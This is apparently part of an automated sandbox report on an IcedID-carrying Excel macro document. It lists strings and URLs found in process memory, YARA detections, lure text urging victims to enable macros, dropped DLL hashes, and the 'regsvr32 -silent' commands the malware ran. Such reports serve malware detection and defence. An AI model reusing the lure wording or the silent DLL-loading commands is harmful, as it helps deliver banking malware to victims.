regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp: http://investor.msn.com
regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp: http://investor.msn.com/
regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp: http://localizability/practices/XML.asp
regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp: http://localizability/practices/XMLConfiguration.asp
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://o.ss2.us/0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.comodoca.com0
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.comodoca.com0%
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.comodoca.com0-
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.comodoca.com0/
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.comodoca.com05
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.entrust.net03
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.entrust.net0D
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.rootca1.amazontrust.com0:
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.rootg2.amazontrust.com08
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://ocsp.sca1b.amazontrust.com06
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://s.ss2.us/r.crl0
regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmp: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
regsvr32.exe, 00000003.00000002.2089228423.0000000001D50000.00000002.00000001.sdmp; regsvr32.exe, 00000004.00000002.2096589121.0000000001D00000.00000002.00000001.sdmp; regsvr32.exe, 00000005.00000002.2097089458.0000000001C70000.00000002.00000001.sdmp: http://servername/isapibackend.dll
regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmp: http://www.%s.comPA
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://www.digicert.com.my/cps.htm02
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://www.diginotar.nl/cps/pkioverheid0
regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp: http://www.hotmail.com/oe
regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmp: http://www.icra.org/vocabulary/.
regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp: http://www.msnbc.com/news/ticker.txt
regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp: http://www.windows.com/pctv.
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: http://x.ss2.us/x.cer0&
regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmp: https://a0.awsstatic.com
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/aws-blog/1.0.47/js
regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/g11n-lib/2.0.76
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/css/1.0.382
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images
regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra-search/1.0.13/js
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra/1.0.385/directories
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/plc/js/1.0.112/plc
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/psf/null
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://a0.awsstatic.com;
regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: https://amazon.com/
regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmp: https://amazonwebservicesinc.tt.omtrdc.net
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp: https://aws.amazon.com/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/?nc2=h_lg
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/ar/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/ar/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/cn/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/cn/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/de/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/de/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/es/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/es/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/fr/
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp: https://aws.amazon.com/fr/?nc1=h_ls
regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp: https://aws.amazon.com/id/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
          Source: regsvr32.exe, 00000004.00000002.2098244987.000000000279D000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Ty
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
          Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknown; Network traffic detected: HTTP traffic on port 49170 -> 443

          E-Banking Fraud:

          Yara detected IcedID
          Source: Yara match; File source: dump.pcap, type: PCAP
          Source: Yara match; File source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          System Summary:

          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Document image extraction number: 0; Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0; Screenshot OCR: Enable Content button from the yellow bar above
          Source: Document image extraction number: 1; Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1; Screenshot OCR: Enable Content button from the yellow bar above
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XTOWN.dll
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_02001678 NtQuerySystemInformation
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_02001810
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_000007FEF8FB15D0
          Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_000007FEF8FB41BF
          Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox View; Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: workbook.xml; Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
          Source: 4.2.regsvr32.exe.2000000.4.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.a0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.a0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
          Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$HRScheduleH3965005.xlsm
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRD365.tmp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\regsvr32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\regsvr32.exe; File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
          Source: Window Recorder; Window detected: More than 3 window changes detected
          Source: HRScheduleH3965005.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
          Source: HRScheduleH3965005.xlsm; Initial sample: OLE zip file path = xl/media/image1.png
          Source: HRScheduleH3965005.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
          Source: HRScheduleH3965005.xlsm; Initial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: XTOWN.dll.0.dr; Static PE information: real checksum: 0x1baf8 should be: 0x19d85
          Source: lsdfik[1].fml.0.dr; Static PE information: real checksum: 0x1baf8 should be: 0x19d85

          Boot Survival:

          Drops PE files to the user root directory
